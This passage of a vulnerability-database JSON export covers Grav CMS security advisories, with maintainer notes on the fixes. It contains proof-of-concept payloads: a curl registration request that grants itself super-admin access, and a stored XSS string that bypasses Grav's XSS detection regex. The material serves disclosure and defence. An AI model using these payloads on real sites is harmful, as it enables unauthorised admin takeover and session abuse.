The attacker's values flow through unchanged.\n\nLater (lines 298-303), these values are assigned directly to the user object:\n\n```php\nif (isset($data['groups'])) {\n    $user->groups = $data['groups'];  // attacker-controlled\n}\nif (isset($data['access'])) {\n    $user->access = $data['access'];  // attacker-controlled\n}\n$user->save();\n```\n\nThe `validateField()` method (lines 363-432) has a `switch` statement that only validates: `username`, `password`, `password2`, `email`, `permissions`, `state`, and `language`. The `groups` and `access` fields pass through the `default` case with **no validation at all**.\n\n## Precondition\n\nRegistration must be enabled with `groups` and/or `access` in the configured allowed fields:\n\n```yaml\n# user/config/plugins/login.yaml\nuser_registration:\n  enabled: true\n  fields:\n    - username\n    - password\n    - email\n    - fullname\n    - groups    # ← enables the attack\n    - access    # ← enables the attack\n```\n\nThis is a configuration the admin UI allows without any warning. 
An admin adding `groups` to let users pick a non-privileged group (e.g., `editors`) unknowingly exposes the escalation path, since there is no validation constraining which groups can be selected.\n\n## Proof of Concept\n\n### Malicious registration request (unauthenticated):\n\n```bash\ncurl -X POST \"${TARGET}/user_register\" \\\n  --data-urlencode \"data[username]=attacker\" \\\n  --data-urlencode \"data[password1]=Str0ngP@ss!\" \\\n  --data-urlencode \"data[password2]=Str0ngP@ss!\" \\\n  --data-urlencode \"data[email]=attacker@evil.com\" \\\n  --data-urlencode \"data[fullname]=Attacker\" \\\n  --data-urlencode \"data[groups][]=admins\" \\\n  --data-urlencode \"data[access][admin][login]=true\" \\\n  --data-urlencode \"data[access][admin][super]=true\" \\\n  --data-urlencode \"data[access][site][login]=true\" \\\n  --data-urlencode \"form-nonce=${FORM_NONCE}\" \\\n  --data-urlencode \"__form-name__=user_register\" \\\n  --data-urlencode \"__unique_form_id__=${FORM_UID}\"\n```\n\n### Resulting account file (`user/accounts/attacker.yaml`):\n\n```yaml\nemail: attacker@evil.com\nfullname: Attacker\ngroups:\n  - admins\naccess:\n  admin:\n    login: true\n    super: true\n  site:\n    login: true\nhashed_password: ...\nstate: enabled\n```\n\nThe attacker can then log into `/admin` with full super-admin privileges.\n\n## Impact\n\n- **Severity:** Critical (when precondition is met)\n- **Vector:** Unauthenticated → Super Admin\n- **Escalation:** Full admin panel access, which chains to RCE via known admin vectors https://github.com/getgrav/grav/security/advisories/GHSA-4fg4-8cr8-326m or Plugin Upload\n- **Precondition:** Registration enabled with `groups` or `access` in allowed fields — a configuration the admin UI permits without warning\n\n\n## Environment\n\n- Grav Core: 1.8.0-beta.29\n- Login Plugin: 3.8.0\n- PHP: 8.4.11\n\n## Credits\n\nJonathan Dersch at Hacking Cult GmbH https://hackingcult.de/\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed 
in **grav-plugin-login 3.8.2** (commit [`3d419a0`](https://github.com/getgrav/grav-plugin-login/commit/3d419a0)). On the Grav 2.0 line, the login plugin is pinned at `>=3.8.2` by admin2's [`blueprints.yaml`](https://github.com/getgrav/grav-plugin-admin2/blob/develop/blueprints.yaml), so sites running admin2 with Grav **2.0.0-beta.2** pick the fix up automatically.\n\n**What changed:** the registration form handler now explicitly skips the `groups` and `access` privilege fields in the per-field input loop — even if an administrator added them to `user_registration.fields`. A warning is logged on any attempted injection. Server-side `default_values`, invitations, and the `user_registration.{groups,access}` config remain the sole sources of those values.\n\n**Files:**\n- [`login.php`](https://github.com/getgrav/grav-plugin-login/blob/develop/login.php) — form handler privilege-field strip.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42613",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00023",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0666",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42613"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-login/commit/3d419a0dabd70aed1fd49afcd5919004a4141da1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:47:25Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-login/commit/3d419a0dabd70aed1fd49afcd5919004a4141da1"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-pxm6-mhxr-q4mj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:47:25Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-pxm6-mhxr-q4mj"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42613",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42613"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pxm6-mhxr-q4mj",
                    "reference_id": "GHSA-pxm6-mhxr-q4mj",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-pxm6-mhxr-q4mj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42613",
                "GHSA-pxm6-mhxr-q4mj"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tkxm-vt8p-tqgv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95218?format=api",
            "vulnerability_id": "VCID-u7yn-d7uj-57bh",
            "summary": "Grav Vulnerable to XSS via Taxonomy Field Values in Admin Panel\n### Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig `|raw` filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel.\n\nAdditionally, Grav's built-in XSS detection (`Security::detectXss()`) can be bypassed by using payloads that close the `<option>/<select>` context and use unquoted event handlers - the `on_events` regex fails to match event handlers without quotes or trailing spaces before `>`.\n\n### Important\n\n- The vulnerability is in the Form plugin (`select.html.twig`), which is installed by default with Grav\n- The XSS is cross-page: a malicious taxonomy value on one page executes when an admin edits any page, because taxonomy options are rendered from a shared global pool\n- An editor can exploit this without any other vulnerability - taxonomy fields are not in the server-side restricted fields list\n- The `HttpOnly` flag on session cookies prevents direct session theft, but the XSS can steal the admin nonce and perform privileged actions via JavaScript\n\n### Permissions Needed\n\n- Editor: can create or edit pages and set taxonomy tag/category values\n\n### Details\n\nThe Form plugin's select field template renders option values using the `|raw` Twig filter, which outputs content without HTML escaping:\n\nFile: `user/plugins/form/templates/forms/fields/select/select.html.twig`\n\n```twig\n{# Line 55 #}\n avalue|raw \n\n{# Line 65 #}\n suboption|t|raw \n\n{# Line 72 #}\n item_value|t|raw \n```\n\nThe taxonomy field in the page editor uses this select template. 
When a page has taxonomy values (tags, categories), these values are populated as `<option>` elements in the select dropdown. The `value` attribute is properly escaped by the browser's attribute encoding, but the **display text** between `<option>` tags is rendered raw:\n\n```html\n<option value=\"&lt;script&gt;alert(1)&lt;/script&gt;\"><script>alert(1)</script></option>\n```\n\nSince taxonomy options are collected globally across all pages (to provide autocomplete/selection), a malicious taxonomy value on any page will appear in the taxonomy dropdown of every page editor - making this a cross-page stored XSS.\n\nThe server-side field restriction in the flex-objects plugin only blocks `['form', 'forms', 'process', 'twig']` for non-super users. Taxonomy fields are not restricted, so editors can freely set arbitrary taxonomy values.\n\n### XSS Detection Bypass\n\nGrav's `Security::detectXss()` checks for `dangerous_tags` (e.g., `<script>`, `<iframe>`), `on_events` (event handlers), and `invalid_protocols` (e.g., `javascript:`). However, the `on_events` regex:\n\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\"\\'\\/)(?:on[a-z]+)\\s*=[\\s|\\'\"'].*[\\s|\\'\"']>#iUu'\n```\n\nrequires either quotes around the handler value or a trailing space before `>`. 
An unquoted handler like `onerror=alert(1)>` (no space before `>`) bypasses this check entirely.\n\nCombined with `</option></select>` to break out of the select context (neither tag is in `dangerous_tags`), the full payload evades all three detection layers and triggers no XSS warning in the admin panel.\n\n### PoC\n\n#### Step 1: Login as Editor\nNavigate to `http://TARGET/admin/` and authenticate with editor credentials.\n\n#### Step 2: Create a Page with Malicious Taxonomy\n- Go to Pages → Add → Add Page\n- Title: `XSS via editor`\n- Go to **Options** Tap\n- On Taxonomies, Add tag:\n```\n</option></select><img src=x onerror=alert('XSS-via-editor')>\n```\n\nThis payload:\n- Closes `</option></select>` to break out of the select dropdown context\n- Injects an `<img>` tag with an unquoted `onerror` handler (bypasses `on_events` regex)\n- Is not in the `dangerous_tags` list (no `<script>`, `<iframe>`, etc.)\n- Triggers no XSS warning in the admin panel\n\n<img width=\"1221\" height=\"857\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6223cbb2-f04b-46bd-89ce-828c89ad77ab\" />\n\n#### Step 3: Trigger the XSS\nWhen any administrator navigates to the page editor of any page (not just the malicious one), the JavaScript executes immediately.\n\n<img width=\"1224\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f008b0f2-dedb-4b22-a74a-cdc0d7325cb4\" />\n\nThe XSS fires because taxonomy tag options are collected globally across all pages and rendered with `|raw` in the select dropdown template. 
The payload breaks out of the `<option>` context, and the browser renders the `<img>` tag as a regular DOM element.\n\n### Impact\n\n- Session hijacking: While `HttpOnly` prevents direct cookie theft, the XSS can steal the admin nonce token and perform any admin action via AJAX requests\n- Privilege escalation: An editor can perform admin-only actions (create users, modify system configuration, install plugins) through the hijacked admin session\n- Cross-page impact: A single malicious taxonomy value affects the entire admin panel - every page editor view is compromised\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed across two repos:\n\n1. **grav-plugin-form 9.0.1** (commit [`6bffb4c`](https://github.com/getgrav/grav-plugin-form/commit/6bffb4c)) — the primary fix. All four `|raw` filters in [`templates/forms/fields/select/select.html.twig`](https://github.com/getgrav/grav-plugin-form/blob/develop/templates/forms/fields/select/select.html.twig) (placeholder, avalue, suboption, item_value) have been removed. Option labels — including taxonomy values that propagate cross-page through the admin's shared selection pool — now go through Twig's default escaper, so a lower-privileged editor can no longer inject script that runs in an admin's browser when they open any page editor.\n\n2. **Grav core on the `2.0` branch** (commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8), ships in **2.0.0-beta.2**) — closes the detection-bypass half of the report. 
The `on_events` regex in `Security::detectXss()` is tightened so unquoted handlers like `onerror=alert(1)>` are flagged (see separate GHSA-9695-8fr9-hw5q), and `option`/`select` have been added to the default `security.xss_dangerous_tags` so `</option></select>…` trips the detector (see separate GHSA-w8cg-7jcj-4vv2).\n\nSites running admin2 on Grav 2.0.0-beta.2 get the 9.0.1 form plugin automatically via its existing dependency graph.\n\n**Files:**\n- [`templates/forms/fields/select/select.html.twig`](https://github.com/getgrav/grav-plugin-form/blob/develop/templates/forms/fields/select/select.html.twig) — four `|raw` removed.\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — `on_events` regex tightened.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php) — includes the GHSA-c2q3 PoC payload.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42842",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0886",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42842"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:24:43Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:24:43Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42842",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42842"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c2q3-p4jr-c55f",
                    "reference_id": "GHSA-c2q3-p4jr-c55f",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-c2q3-p4jr-c55f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42842",
                "GHSA-c2q3-p4jr-c55f"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u7yn-d7uj-57bh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49309?format=api",
            "vulnerability_id": "VCID-v8u1-nbxw-a7fr",
            "summary": "Grav Admin Plugin is vulnerable to Stored Cross-Site Scripting (XSS) at endpoint `/admin/accounts/groups/[group]` via parameter `data[readableName]`\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/accounts/groups/Grupo` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[readableName]` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66312",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07273",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66312"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66312",
                    "reference_id": "CVE-2025-66312",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66312"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rmw5-f87r-w988",
                    "reference_id": "GHSA-rmw5-f87r-w988",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rmw5-f87r-w988"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988",
                    "reference_id": "GHSA-rmw5-f87r-w988",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66312",
                "GHSA-rmw5-f87r-w988"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v8u1-nbxw-a7fr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49314?format=api",
            "vulnerability_id": "VCID-v9n7-vann-6fa5",
            "summary": "Grav is vulnerable to Reflected Cross-Site Scripting (XSS) at endpoint /admin/pages/[page], parameter data[header][content][items], located in the \"Blog Config\" tab\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][content][items]` parameter.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66309",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09585",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66309"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66309",
                    "reference_id": "CVE-2025-66309",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66309"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-65mj-f7p4-wggq",
                    "reference_id": "GHSA-65mj-f7p4-wggq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-65mj-f7p4-wggq"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq",
                    "reference_id": "GHSA-65mj-f7p4-wggq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66309",
                "GHSA-65mj-f7p4-wggq"
            ],
